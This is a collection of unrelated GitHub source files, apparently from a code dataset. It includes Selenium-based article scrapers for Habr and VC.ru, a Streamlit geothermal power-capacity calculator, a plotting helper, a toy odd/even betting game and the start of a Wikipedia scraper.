CostOfEdge(xNear,xNewNode)< Cost(xNear):\n\n xParent = xNear.parent\n xNewNode.addChild(xNear)\n xParent.connected.pop(xParent.connected.index(xNear))\n if distToPoint(xNewNode,target)< acc:\n pathsEnds.append(xNewNode)\n if(len(pathsEnds)>0):\n minNode = min(pathsEnds, key = lambda x:Cost(x))\n path = getPathToGoal(minNode)\n vis.path = path\n up()\n else:\n if not printed:\n printed = True\n print(\"time to Execute:\",n,time.time() - start_time)\n \n \n #vis.update()\n 
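        # Hedged aside (added comment, not original code): the commented-out
        # Near() call earlier in this loop hints at a shrinking search radius.
        # The standard RRT* radius from Karaman & Frazzoli (2011), with
        # n = cardV nodes and d the space dimension, would be roughly
        #   r = min(eta, gammaRRT * (np.log(cardV) / cardV) ** (1.0 / d))
        # whereas the active code keeps the fixed radius in Near(root, xNew, eta).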
#pygame.display.flip()\n","repo_name":"AndrewCDownie/MTHE493","sub_path":"RRTStar.py","file_name":"RRTStar.py","file_ext":"py","file_size_in_byte":2916,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"17787617502","text":"# -*- coding: utf-8 -*-\n\"\"\"\nAll service parsers implemented in this module. Parser registration goes here too.\n\nWhen adding new Source all we have to do is to implement two new classes: SourceParser and SourceParserBuilder.\nFinally, we will need to register our newly created Parser within our Factory and we are done.\n\"\"\"\n\nimport requests\nimport logging\nimport os\nimport concurrent.futures\nimport itertools\nfrom bs4 import BeautifulSoup\nfrom time import sleep\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom fake_useragent import UserAgent\n\nfrom .factory import ObjectFactory\nfrom article.models import Article\n\nlogger = logging.getLogger('django')\n\napp_dir = os.path.dirname(os.path.abspath(__file__))\nuseragent = UserAgent()\nprofile = webdriver.FirefoxProfile()\n\n\nclass HabrParser:\n \"\"\"Parser for HabraHabr resource.\"\"\"\n\n def __init__(self, driver):\n self.driver = driver\n\n def test_connection(self):\n \"\"\"Test if authentication to source with user credentials went fine.\"\"\"\n\n auth_flag = False\n if self.driver.get_cookies():\n cookies = self.driver.get_cookies()\n for cookie in cookies:\n if cookie.get('name') == 'acc_sess_id':\n auth_flag = True\n break\n\n return auth_flag\n\n def do_parse(self, url):\n \"\"\"Start parsing process. Get pages to parse. Return generator with parsed articles\"\"\"\n\n sleep(1)\n feed_url = 'https://habr.com/ru/conversations/'\n # we have to visit some light-weight page before going to feed to prevent redirect\n self.driver.get(feed_url)\n\n sleep(1)\n feed_url = 'https://habr.com/ru/feed/'\n self.driver.get(feed_url)\n\n html = self.driver.page_source\n soup = BeautifulSoup(html, 'lxml')\n\n paginator = soup.find('ul', id='nav-pagess')\n pages_with_arts = ['https://habr.com/ru/feed/page1/'] # list of pages to be iterated through\n if paginator:\n lis = [li for li in paginator.find_all('li')]\n last_li_href = lis[-1].find('a')['href']\n last_page = int(last_li_href.split('/')[-2].split('page')[-1])\n\n for i in range(2, last_page + 1):\n pages_with_arts.append('https://habr.com/ru/feed/page{}/'.format(i))\n\n # TODO: implement multithreading. We need separate driver (?) for each thread to work properly within selenium\n # with concurrent.futures.ThreadPoolExecutor(max_workers=10) as executor:\n # articles = executor.map(self.parse_page, pages_with_arts)\n\n articles = list()\n pages_with_arts = pages_with_arts[:3] # for fast debug\n for page in pages_with_arts:\n articles.append(self.parse_page(page))\n\n self.driver.close()\n\n return list(itertools.chain(*articles))\n\n def parse_page(self, page):\n \"\"\"Receives page url to parse articles from. 
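        A hypothetical call, assuming an already-authorised parser instance:
        page_articles = parser.parse_page('https://habr.com/ru/feed/page2/').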
Returns list of articles.\"\"\"\n sleep(1)\n\n self.driver.get(page)\n page_html = self.driver.page_source\n soup = BeautifulSoup(page_html, 'lxml')\n articles = soup.find_all('article')\n\n page_articles = list()\n if articles:\n # attempt to speed up the process while main threading doesn't work in current selenium realization\n with concurrent.futures.ThreadPoolExecutor(max_workers=10) as executor:\n page_articles = executor.map(self.parse_article, articles)\n\n return page_articles\n\n def parse_article(self, article):\n parsed_article = dict()\n h2 = article.find('h2')\n h2_a = article.find('h2').find('a')\n href = h2_a['href'] if h2_a else ''\n\n if href:\n try:\n article = Article.objects.get(url=href)\n except Article.DoesNotExist:\n article = None\n\n if not article:\n try:\n detail = BeautifulSoup(requests.get(href).content, \"lxml\")\n body_post = detail.find('div', id='post-content-body')\n if body_post:\n full_text = detail.find('div', id='post-content-body').get_text().strip()\n parsed_article = {\n 'url': href,\n 'header': h2.get_text().strip(),\n 'text': full_text\n }\n sleep(0.5)\n else:\n logging.error(\"URL {} has no body.\".format(href))\n except Exception as ex:\n logger.error('Error \"{}\" while trying to open url: {}'.format(ex, href))\n else:\n # we have already stored this article in database and just need to connect it with user\n parsed_article = {\n 'db_article': article\n }\n\n return parsed_article\n\n\nclass HabrParserBuilder:\n def __init__(self):\n self._instance = None\n\n def __call__(self, login, password, **kwargs):\n driver = self.authorize(login, password)\n return HabrParser(driver)\n\n def authorize(self, login, password):\n \"\"\"\n Method authorize user within HabraHabr and return selenium driver object with all required cookies.\n\n Receives user login and password. 
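        Whether the login actually worked can be checked afterwards with
        HabrParser.test_connection(), which looks for the 'acc_sess_id' cookie.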
Generates random fake user agent.\n Using selenium authorizes user, retrieves cookies.\n Returns selenium web driver object for next actions.\n\n :param login:\n :param password:\n :return: webdriver:driver\n \"\"\"\n\n profile.set_preference('general.useragent.override', useragent.random)\n\n driver = webdriver.Firefox(profile)\n\n url = \"https://account.habr.com/login/\"\n driver.get(url)\n driver.find_element_by_id('email_field').send_keys(login)\n sleep(.5)\n driver.find_element_by_id('password_field').send_keys(password)\n sleep(1)\n driver.find_element_by_name('go').click()\n\n return driver\n\n\nclass VcParser:\n \"\"\"Parse for VC.RU resource.\"\"\"\n\n def __init__(self, driver):\n self.driver = driver\n\n def test_connection(self):\n \"\"\"Test if authentication to source with user credentials went fine.\"\"\"\n\n auth_flag = False\n if self.driver.get_cookies():\n cookies = self.driver.get_cookies()\n for cookie in cookies:\n if cookie.get('name') == 'osnova-aid':\n auth_flag = True\n break\n\n return auth_flag\n\n def do_parse(self, url):\n \"\"\"Starts parsing process\"\"\"\n sleep(1)\n\n height = self.driver.execute_script(\"return document.body.scrollHeight\")\n # Simulation of scrolling down process, until all articles will be shown\n while True:\n body = self.driver.find_element_by_tag_name('body')\n body.send_keys(Keys.END)\n\n sleep(3) # wait till new articles will be loaded via AJAX\n\n current_height = self.driver.execute_script(\"return document.body.scrollHeight\")\n if current_height != height:\n height = current_height\n else:\n # no more articles to load\n break\n\n page_html = self.driver.page_source\n soup = BeautifulSoup(page_html, 'lxml')\n articles = soup.find_all('div', {'class': 'feed__item l-island-round'})\n\n with concurrent.futures.ThreadPoolExecutor(max_workers=10) as executor:\n page_articles = executor.map(self.parse_article, articles)\n\n self.driver.close()\n\n return page_articles\n\n def parse_article(self, article):\n \"\"\"Receives article preview. 
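        The preview is a BeautifulSoup tag for one 'feed__item' div collected
        by do_parse() above.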
Return dict with fill article info, or with existed article in db.\"\"\"\n\n parsed_article = dict()\n\n author = article.find('div', {'class': 'content-header-author__name'})\n if author and author.get_text().strip() != \"Промо\": # we don't want promo blocks to get parsed\n h2 = article.find('h2')\n full_link = article.find('a', {'class': 'content-feed__link'})\n href = full_link['href'] if full_link else ''\n\n if href:\n try:\n article = Article.objects.get(url=href)\n except Article.DoesNotExist:\n article = None\n\n if not article:\n try:\n detail = BeautifulSoup(requests.get(href).content, \"lxml\")\n body_post = detail.find('div', {'class': 'content content--full'})\n if body_post:\n # remove some web page stuff\n try:\n body_post.find('div', {'class': 'l-island-a l-mv-20 content-counters'}).decompose()\n body_post.find('div', {'class': 'authorCard l-mt-30'}).decompose()\n except Exception as ex:\n logger.error('Error \"{}\" while trying to remove unused elements from page: {}'.format(ex, href))\n full_text = body_post.get_text().strip()\n parsed_article = {\n 'url': href,\n 'header': h2.get_text().strip(),\n 'text': full_text\n }\n sleep(0.5)\n else:\n logging.error(\"URL {} has no body.\".format(href))\n except Exception as ex:\n logger.error('Error \"{}\" while trying to open url: {}'.format(ex, href))\n else:\n # we have already stored this article in database and just need to connect it with user\n parsed_article = {\n 'db_article': article\n }\n\n return parsed_article\n\n\nclass VcParserBuilder:\n def __init__(self):\n self._instance = None\n\n def __call__(self, login, password, **kwargs):\n driver = self.authorize(login, password)\n return VcParser(driver)\n\n def authorize(self, login, password):\n \"\"\"\n Method authorize user within VC and return selenium driver object with all required cookies.\n\n Receives user login and password. 
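        A successful login can later be verified with VcParser.test_connection(),
        which looks for the site's 'osnova-aid' cookie.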
Generates random fake user agent.\n Using selenium authorizes user, retrieves cookies.\n Returns selenium web driver object for next actions.\n\n :param login:\n :param password:\n :return: webdriver:driver\n \"\"\"\n\n profile.set_preference('general.useragent.override', useragent.random)\n\n driver = webdriver.Firefox(profile)\n\n try:\n url = \"https://vc.ru/\"\n driver.get(url)\n driver.find_element_by_class_name('site-header-user-login__label').click()\n auth_buttons = driver.find_elements_by_class_name('social-auth__button')\n for button in auth_buttons:\n if button.get_attribute('air-click') == 'auth_goto_tab':\n button.click()\n break\n driver.find_element_by_name('login').send_keys(login)\n sleep(.5)\n driver.find_element_by_name('password').send_keys(password)\n sleep(1)\n driver.find_element_by_name('password').send_keys(Keys.ENTER)\n except Exception as ex:\n logger.error('Error during auth process VC.RU: {}'.format(ex))\n\n return driver\n\n\nfactory = ObjectFactory()\nfactory.register_builder('HABR', HabrParserBuilder())\nfactory.register_builder('VC', VcParserBuilder())\n","repo_name":"UNREALre/TopArticles","sub_path":"top_parser/parsers.py","file_name":"parsers.py","file_ext":"py","file_size_in_byte":11715,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"33182401580","text":"import pandas as pd\nimport matplotlib\n\ndef plot_bar_by_feature(dataset, feature, size_delta=(0,0)):\n features = dataset.columns.tolist()\n if feature not in features:\n return\n data = {feature:[], 'counts':[]}\n for a in dataset[feature].unique():\n data[feature].append(a)\n data['counts'].append(dataset[dataset[feature] == a].shape[0])\n DFData = pd.DataFrame(data)\n DFData = DFData.sort_values(by=['counts'], ascending=False)\n a = DFData.plot.bar(x=feature, y='counts')\n W,H = a.figure.get_size_inches()\n a.figure.set_size_inches(W+size_delta[0],H+size_delta[1])\n a.figure.show()\n # a.figure.savefig('../images/'+feature)","repo_name":"SongShawn/MachineLearning","sub_path":"capstone/solutions/visual.py","file_name":"visual.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"39305027194","text":"# -*- coding: utf-8 -*-\n\"\"\"\nApp created on Thu May 13 09:31:30 2021\nThen expanded on with love. \n\nThis app remains a work in progress :-) \n\nKey changes needed include:\n- Chat to Jan about the addion of mean and sd of input paramaters. \n Perhaps it would be better to include an option to download the paramaters as passed in\n plus a calculated P50. It would also be useful to include the P10-P50-P90 MWe result in this. \n\n- Copy edit and trim the text. \n\n- Remake the power density plot into something that better reflects the underlying data.\n\n- Set up to call the calculate_cumulative_conf from a helper function file \n rather than repeat here and elsewhere in the repo. 
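  (for example a shared "from helpers import calculate_cumulative_conf", where
  "helpers" is a hypothetical module name; the function is currently defined
  again in the Helper functions section of this file).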
\n\nThere are a number of working refinements and thoughts throughout this file tagged with \"NOTE\"\n\n\"\"\"\n\n# Import libraries for viz\nimport streamlit as st\nimport plotly.express as px\nimport pandas as pd\nimport base64\nfrom pathlib import Path\n\n# Import libraries for computation\nimport numpy as np\nimport scipy\nfrom scipy.stats import norm, lognorm\nimport matplotlib.pyplot as plt\n\n# ================\n# Helper functions\n# ================\n\n# NOTE We should look at calling the calculate_cumulative_conf function from a centralized function file\n\ndef download_link(object_to_download, download_filename, download_link_text):\n \"\"\"Generates a link from which the user can download object_to_download \n \n Method from https://discuss.streamlit.io/t/heres-a-download-function-that-works-for-dataframes-and-txt/4052\n\n Args: object_to_download (str, pd.DataFrame): The object to be downloaded\n download_filename (str): Filename and extension of file (e.g. mydata.csv or some_txt_output.txt)\n download_link_text (str): Text to display for download link\n\n Example: download_link(YOUR_DF, 'YOUR_DF.csv', 'CSV built! Click here to download your data!')\n \"\"\"\n if isinstance(object_to_download,pd.DataFrame):\n object_to_download = object_to_download.to_csv(index=True)\n\n # some strings <-> bytes conversions necessary here\n b64 = base64.b64encode(object_to_download.encode()).decode()\n\n return f'<a href=\"data:file/txt;base64,{b64}\" download=\"{download_filename}\">{download_link_text}</a>'\n\n\ndef calculate_cumulative_conf(areaP90: float=1., areaP10: float=10., pdP90: float=10., pdP10: float=24):\n \"\"\"Calculate cumulative confidence level for expected development size in MW\n\n Args:\n areaP90 (float): pessimistic area in sqkm\n areaP10 (float): optimistic area in sqkm\n pdP90 (float): pessimistic power density in MWe/sqkm\n pdP10 (float): optimistic power density in MWe/sqkm\n\n Returns:\n prob_df (pandas Dataframe): cumulative confidence curve in Reservoir Size\n \"\"\"\n # calculate area > 250 °C\n area_mu = ((np.log(areaP90)+np.log(areaP10))/2)\n area_sigma = (np.log(areaP10)-np.log(areaP90))/((norm.ppf(0.9)-(norm.ppf(0.1))))\n\n # calculate powerdensity mean and standard dev\n powerdens_mu = ((np.log(pdP90)+np.log(pdP10))/2)\n powerdens_sigma = (np.log(pdP10)-np.log(pdP90))/((norm.ppf(0.9)-(norm.ppf(0.1))))\n\n\n capacity_mu = area_mu + powerdens_mu\n capacity_sigma = ((area_sigma**2)+(powerdens_sigma**2))**0.5\n eds = [lognorm.ppf(x/100, capacity_sigma, loc=0, scale=np.exp(capacity_mu)) for x in range(0,100)]\n indx = list(np.arange(0,100)[::-1])\n edsepc_tups = list(zip(indx,eds))\n prob_df = pd.DataFrame(edsepc_tups, columns = ['Cumulative confidence (%)', 'Expected development size (MWe)'])\n\n return prob_df\n\n\n# =============\n# Streamlit app\n# =============\n\n# ----------------------\n# Headder and intro text\n# ----------------------\n\nst.title('Conventional Geothermal Resource Exploration Tool')\n\nst.write('This tool does the calculations required for estimating the:')\n\nst.write('1. Probability of exploration success') \nst.write('2. Resource capacity using a probabilistic, lognormal power density method')\n\nst.markdown(\"___\")\n\n# -----------------------------------\n# Estimate the probability of success \n# -----------------------------------\n\nst.write('# 1. 
Probability of Exploration Success')\n\nst.write('This is a transparent method for estimating the probability of exploration success, ' + \n 'where exploration success is defined as discovering a commercially viable resource.')\n\n# NOTE need to find better way of formatting lists\n\nst.write('Estimate the percent confidence that the prospect has the following ' + \n 'based on the available resource data and the conceptual model:') \n\nst.write('1. Sufficient temperature for the desired power conversion technology or direct use application')\nst.write('2. Enough permeability to support economic well flows (self-flowing or pumped wells)')\nst.write('3. Benign or manageable fluid chemistry') \n\nst.write(' ') # NOTE need to look into better method for spacing layout \n\n#\n# Make sliders\n#\n\ncol1, col2, col3 = st.columns(3) # Show sliders in 3 columns\n\nPtemp = col1.slider('Temperature', value=65, min_value=1, max_value=100,step=1, format='%i%%', key='Ptemp')\nPperm = col2.slider('Permeability', value=65, min_value=1, max_value=100,step=1, format='%i%%', key='Pperm')\nPchem = col3.slider('Chemistry', value=95, min_value=1, max_value=100,step=1, format='%i%%', key='Pchem')\n\n\n#\n# Calculate POS in decimal percent\n#\n\nPtemp /= 100 \nPperm /= 100\nPchem /= 100\n\nPOSexpl = Ptemp * Pperm * Pchem\n\n\n#\n# Output POS result to app in percent rounded to nearest whole number\n#\n\nst.write(f'_{round(Ptemp*100)}% temperature \\* {round(Pperm*100)}% permeability ' +\n f'* {round(Pchem*100)}% chemistry = {round(POSexpl*100)}% probability of exploration success_')\n\n\n#\n# App formatting\n#\n\nst.markdown(\"___\")\n\n\n# -----------------------\n# Estimate power capacity\n# -----------------------\n\n\n#\n# Intro text\n#\n\nst.write(\"# 2. Power Capacity\")\n\nst.write('Power density is one of several methods used to evaluate the ' + \n 'power capacity of conventional geothermal resources. ' + \n 'The power density method implemented here uses a probabilistic framework where ' + \n 'pessimistic (P90) and optimistic (P10) estimates of area and power density ' +\n 'are input and a probability distribution of power capacity is returned. ' +\n 'The entire method involves three steps, and this tool does the calculations required for the third step.')\n\nst.write('**Step 1:** Integrates available resource data into a set of conceptual models ' +\n 'that reflect the smallest (pessimistic, P90) and largest (optimistic, P10) resource ' +\n 'that could be present. The P50 model is typically also discussed at this stage, but is not an input parameter for Step 3. ' + \n 'Refer to [Cumming 2009](https://pangea.stanford.edu/ERE/pdf/IGAstandard/SGW/2009/cumming.pdf) ' +\n 'for how to construct conceptual models from surface exploration data. Refer to ' +\n '[Wallis et al 2017](https://www.geothermal-energy.org/pdf/IGAstandard/NZGW/2017/111_Wallis-Final_.pdf) ' + \n 'for approaches to reservoir volume uncertainty and a tool that assists with developing the P10/P90 end-member models.')\n\nst.write('**Step 2:** Project the potentially productive resource volume in the P10 and P90 conceptual models ' + \n 'to a plan-view map and calculate the area. The potentially productive resource is the extent of ' + \n 'the reservoir with sufficient temperature to support the desired power conversion technology or direct use application. ' +\n 'This means that resource areas below the temperature limit of preferred power conversion technology are excluded. 
'\n 'Refer to [Cumming 2016a](https://publications.mygeoenergynow.org/grc/1032377.pdf) (Figure 9) for ' + \n 'how to project the conceptual models to surface and calculate the area.' )\n\nst.write('**Step 3:** Calculate the power capacity by ' +\n 'multiplying the P10 and P90 area of the potentially productive resource (km2) with a range of ' + \n 'power density (MWe/km2), where the latter by comparison to analogous developed resources. ' +\n 'Sections 2.1 and 2.2 below are designed to assist resource scientists with this step. '\n 'The lognormal approach to power density used in this web-app is described in ' +\n '[Cumming 2016b](https://pangea.stanford.edu/ERE/pdf/IGAstandard/SGW/2016/Cumming.pdf).')\n\n# --------------------------------\n# Select Appropriate Power Density\n# --------------------------------\n\nst.write('# 2.1 Estimate Power Density')\n\nst.write('Power density is defined as the sustainable generation (in megawatts) per square kilometer of productive resource area. '+\n 'Below we step through how a reasonable range of power capacity can be identified for an exploration prospect. ')\n\nst.write('Because there is a strong relationship between temperature and power capacity, temperature guides selection of the ' +\n 'power density values that are used to calculate capacity. However, temperature is not used in the calculation. The values input below are included for reporting purposes. ')\n\ncolA, colB = st.columns(2)\n\n# NOTE should probably should add a message/try catch that says these fields must be numeric\nTmax = float(colA.text_input(\"Average temperature (degC) in the P90 area\", 280))\nTmin = float(colB.text_input(\"Minimum temperature for the P10 area (degC)\", 250))\n\nst.write('Use these temperatures and the geologic setting of your prospect to ' + \n 'identify developed geothermal systems that have similar characteristics. ' +\n 'We use geologic setting to identify analogues because geology influences permeability, ' + \n 'which is another resource characteristic that greatly influences power capacity. ' )\n\nst.write('Evaluation of the production area and power capacity of well-selected developed analogues ' + \n 'provides the most reliable range of power density. ' + \n 'For open access information on developed resources, refer to conference paper databases ' +\n 'maintained by the [International Geothermal Association](https://www.geothermal-energy.org/explore/our-databases/conference-paper-database/) ' + \n 'and [Geothermal Rising](https://www.geothermal-library.org/). ' + \n 'NREL maintains [geothermal wiki](https://openei.org/wiki/Geothermal_Areas) that is a growing repository of case study information.')\n\nst.write('If no analogues can be identified, then take the minimum temperature of the P10 area ' +\n 'and find a power density range using the plot below. ' + \n 'For example, a minimum P10 temperature of 250degC would yeld a range as wide as 2 - 23 MW/km2. 
' +\n 'This wide range is appropriate and reflects the large uncertainty present in the power density estimate when there are no developed analogues.')\n\npd_database = pd.read_csv(r'https://raw.githubusercontent.com/Geothermal-Resource-Capacity/Power-Density/main/data/PowerDensityDatabase_Expanded.csv')\nfig = px.scatter(\n pd_database, \n x='Average temperature [degC]', \n y='Power density [MWe/km2]', \n color='System type',\n hover_data=['Field', 'System type', 'Average temperature [degC]', 'Enthalpy classification', 'Power density [MWe/km2]'],\n)\n\nst.plotly_chart(fig)\n\nst.write('The plotted power density and average temperature are from Wilmarth et al. (2019), which expands on earlier work published ' + \n '[here](https://www.geothermal-energy.org/pdf/IGAstandard/WGC/2015/16020.pdf). ' +\n 'The power density was calculated by dividing the sustained production in MWe by the area within a merged 500 m buffer ' + \n 'placed around production wells. It follows that these power densities may not directly equate to the area of potentially productive resource ' + \n 'and the areas defined using the concept model process. However, these power density values were created using a systematic approach and are a reasonable approximation. ' +\n 'The information on system type and enthalpy classification ' +\n 'are from literature review conducted by Irene Wallis. The data in this plot has been ' + \n 'made open access in [this repository](https://github.com/Geothermal-Resource-Capacity/Power-Density) under an Apache 2 license.') \n\n# ---------------------------\n# Power capacity - user input\n# ---------------------------\n\nst.write('# 2.2 Calculate Power Capacity')\nst.write('Input your P90 (pessimistic) and P10 (optimistic) estimates for ' + \n 'area from your conceptual model and power density based on developed analogues.') \n\ncolA, colB = st.columns(2)\n\ncolA.header(\"Input Area\")\ncolB.header(\"Input Power Density\")\n\nArea_P90 = float(colA.text_input(\"P90 (pessimistic) production area (km2)\", 1))\nPowerDens_P90 = float(colB.text_input(\"P90 (pessimistic) power density (MWe/km2)\", 10))\n\nArea_P10 = float(colA.text_input(\"P10 (optimistic) production area (km2)\", 10))\nPowerDens_P10 = float(colB.text_input(\"P10 (optimistic) power density (MWe/km2)\", 24))\n\n# ----------------------------------------------\n# Power capacity - calculations (under the hood)\n# ----------------------------------------------\n\n# Calculate nu and sigma for resource area \n# (the mean and variance in log units required for specifying lognormal distributions)\narea_nu = ((np.log(Area_P90)+np.log(Area_P10))/2)\narea_sigma = (np.log(Area_P10)-np.log(Area_P90))/((norm.ppf(1-0.1)-(norm.ppf(0.1))))\n\n# Calculate nu and sigma for the power density\npowerdens_nu = ((np.log(PowerDens_P90)+np.log(PowerDens_P10))/2)\npowerdens_sigma = (np.log(PowerDens_P10)-np.log(PowerDens_P90))/((norm.ppf(1-0.1)-(norm.ppf(0.1))))\n\n# Calculate nu and sigma for MWe Capacity\ncapacity_nu = area_nu + powerdens_nu\ncapacity_sigma = ((area_sigma**2)+(powerdens_sigma**2))**0.5\n\nindices = ['area [sqkm]', 'power_density [MWe/sqkm]', 'capacity [MWe]']\np_values = {'P90': [Area_P90, PowerDens_P90, 'P90_capacity'],\n 'P50': [round(np.exp(area_nu)), round(np.exp(powerdens_nu)), round(np.exp(capacity_nu))],\n 'P10': [Area_P10, PowerDens_P10, 'P10_capacity']}\n\n# NOTE double check these outputs against the cumulative confidence curve\n# Why does np.exp(capacity_nu) = 49% in the cumulative confidence curve data rather than 50%?\n# 
Would be good also to include the P90 and P10 capacity into the output table\n\nparam_df = pd.DataFrame.from_dict(p_values, orient='index', columns=indices)\n\n# Calculate cumulative confidence curve\nprob_df = calculate_cumulative_conf(Area_P90, Area_P10, PowerDens_P90, PowerDens_P10)\n\n\n# ------------------------------------------\n# Power capacity - simple web output to user \n# ------------------------------------------\n\n#\n# Table summarising input and output \n#\n\ncol1, col2, col3, col4 = st.columns([2,1,1,1])\n\n# Table headder\ncol1.header(\"Output\")\ncol2.header(\"P90\")\ncol3.header(\"P50\")\ncol4.header(\"P10\")\n\n# Row 1 - Range of areas\ncol1.write('Area (km2)')\ncol2.write(Area_P90)\ncol3.write(round(np.exp(area_nu),1))\ncol4.write(Area_P10)\n\n# Row 2 - Range of power density\ncol1.write('Power Density (MWe/km2)')\ncol2.write(PowerDens_P90)\ncol3.write(round(np.exp(powerdens_nu),1))\ncol4.write(PowerDens_P10)\n\n# Row 3 - Range of power capacity\ncol1.write('Power Capacity (MWe)')\n\nP90_MWe = prob_df.iloc[9,1]\ncol2.write(round(P90_MWe,1))\n\nP50_MWe = prob_df.iloc[49,1]\ncol3.write(round(P50_MWe,1))\n\nP10_MWe = prob_df.iloc[89,1]\ncol4.write(round(P10_MWe,1))\n\n#\n# Plot cumulative confidence curve\n#\nst.write('')\n\n# User input field for x axis max limit\ncola, colb = st.columns(2)\nx_max = float(cola.text_input(\"Maximum MWe for the cumulative confidence plot below\", 500))\n\n# Plotly plot setup\nfig = px.bar(\n data_frame = prob_df, \n y='Cumulative confidence (%)', \n x='Expected development size (MWe)', \n orientation='h', \n range_x=[0,x_max])\n\nst.plotly_chart(fig)\n\n# -------------------------------------------------------------------------\n# Power capacity - Show/hide full results summary and downloadable results \n# -------------------------------------------------------------------------\n\nst_ex_AdvancedOutput = st.expander(label=\"Detailed output and downloads\") # Make an expander object\n\nwith st_ex_AdvancedOutput: # Make these results hidden until expanded\n ### Text output ###\n st.markdown(\"___\")\n #st.write(\"## Computation outputs \")\n # Display the table, only every 10th row, and hide the index column to make it pretty\n st.table(prob_df[prob_df.index%10==9].assign(hideIndex='').set_index('hideIndex'))\n\n st.write(\"Calculate nu and sigma for area > 250 degC (the mean and variance in log units required for specifying lognormal distributions)\", area_nu)\n st.write(\"Area sigma\", area_sigma)\n \n # Calculate nu and sigma for power density (the mean and variance in log units required for specifying lognormal distributions)\n st.write(\"Calculate nu and sigma for power density (the mean and variance in log units required for specifying lognormal distributions)\")\n st.write(\"Power density nu \",powerdens_nu)\n st.write(\"Power density sigma \", powerdens_sigma)\n \"capacity_sigma\", capacity_sigma\n \"capacity_nu\", capacity_nu\n\n st.write(\"### Click to download results\")\n\n # Note, new versions of streamlit have a built in download button\n # If the current version ever brakes, consider switching to the built-in\n # Link below, scroll down slightly from there.\n # https://docs.streamlit.io/en/stable/api.html#display-interactive-widgets\n \n if st.button('Build Confidence-curve CSV for download'):\n tmp_download_link = download_link(prob_df, 'cum_conf_curve.csv', 'CSV built! 
Click here to download your data!')\n st.markdown(tmp_download_link, unsafe_allow_html=True)\n\n if st.button('Build parameter CSV for download'):\n tmp_download_link_params = download_link(param_df, 'parameter_values.csv', 'CSV built! Click here to download your data!')\n st.markdown(tmp_download_link_params, unsafe_allow_html=True)\n\n st.markdown(\"___\")\n\n# ----------\n# App footer\n# ----------\n\nst.markdown(\"___\")\n\nst.write(\"\") \n\nst.write(\"Made with ❤️ at the [SWUNG 2021 geothermal hack-a-thon](https://softwareunderground.org/events/2021/5/13/geothermal-hackathon)\")\nst.write(\"See the [github repo](https://github.com/Geothermal-Resource-Capacity/Power-Density) for project information and contributors\")\n","repo_name":"Geothermal-Resource-Capacity/Power-Density","sub_path":"streamlit/Power-Density_streamlit.py","file_name":"Power-Density_streamlit.py","file_ext":"py","file_size_in_byte":18126,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"39405740630","text":"import random\nimport os\n\ndef random_number(): \n return random.randint(1, 2) \n\ntienvnd = 500000\nbankvnd = 0\ncauhoi = \"Bạn có muốn tiếp tục không ?\"\nluachon = \"0. Không || 1. Có\"\nlichsu = []\nwhile True:\n print(\"Số dư của bạn hiện tại là:\",tienvnd)\n # Chọn điều kiện chẵn lẻ\n print(\"Mời chọn chẵn hoặc lẻ:\")\n print(\"1. Lẻ || 2. Chẵn\")\n print(\"Chọn:\")\n chon = int(input())\n print(\"Con số random ra là: \",random_number())\n if chon == 1:\n print(\"Bạn chọn lẻ\")\n elif chon == 2:\n print(\"Bạn chọn chẵn\")\n else:\n while True:\n print(\"Vui lòng chỉ chọn 1 hoặc 2\")\n print(\"Chọn:\")\n chon = int(input())\n if chon == 1 or chon == 2: \n break\n # Cải tiến khi chọn đúng or sai\n if(chon == random_number()):\n print(\"Chúc mừng bạn chọn đúng ^_^\")\n tienvnd += 50000\n bankvnd = tienvnd\n lichsu.append(bankvnd)\n print(\"Lịch sử giao dịch của bạn:\",lichsu)\n else:\n print(\"Rất tiếc, bạn chọn sai :(\")\n tienvnd -= 50000\n bankvnd = tienvnd\n lichsu.append(bankvnd)\n print(\"Lịch sử giao dịch của bạn:\",lichsu)\n \n print(cauhoi)\n print(luachon) \n x = int(input())\n if x == 0:\n break\n else:\n os.system(\"cls\")\n\n\n\n\n","repo_name":"bachsykhang/gamechanlepython","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":1438,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"12483639592","text":"# Import the necessary modules\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport os\r\nimport wikipedia\r\nfrom nltk.tokenize import RegexpTokenizer\r\n\r\n# Change the working directory to the script's directory\r\nos.chdir('C:\\\\Users\\\\Adeet Patel\\\\Google Drive\\\\Documents\\\\Education\\\\University\\\\Clubs\\\\HackCville\\\\Skills Course - Node\\\\Projects\\\\Web Scraping')\r\n\r\n# Import the list of senators and political parties, and create two separate dataframes: one for Democrats and one for Republicans\r\nsenators = pd.read_csv('Senator List.csv')\r\ndemocrats = senators[senators['Party'] == 'Democrat']\r\nrepublicans = senators[senators['Party'] == 'Republican']\r\n\r\n# Download each senator's article content via web scraping, using the Wikipedia API\r\n# Create two lists - pages_R and pages_D - which contain the article content for each Republican and Democrat senator, respectively\r\n\r\nprint('Downloading Republican senator data...')\r\npages_R = []\r\nfor senator in republicans.iloc[:, 0]:\r\n 
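    # Added note (not in the original): wikipedia.page() raises
    # wikipedia.DisambiguationError or wikipedia.PageError for ambiguous or
    # missing titles, so a try/except around this call would make the
    # download loop more robust.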
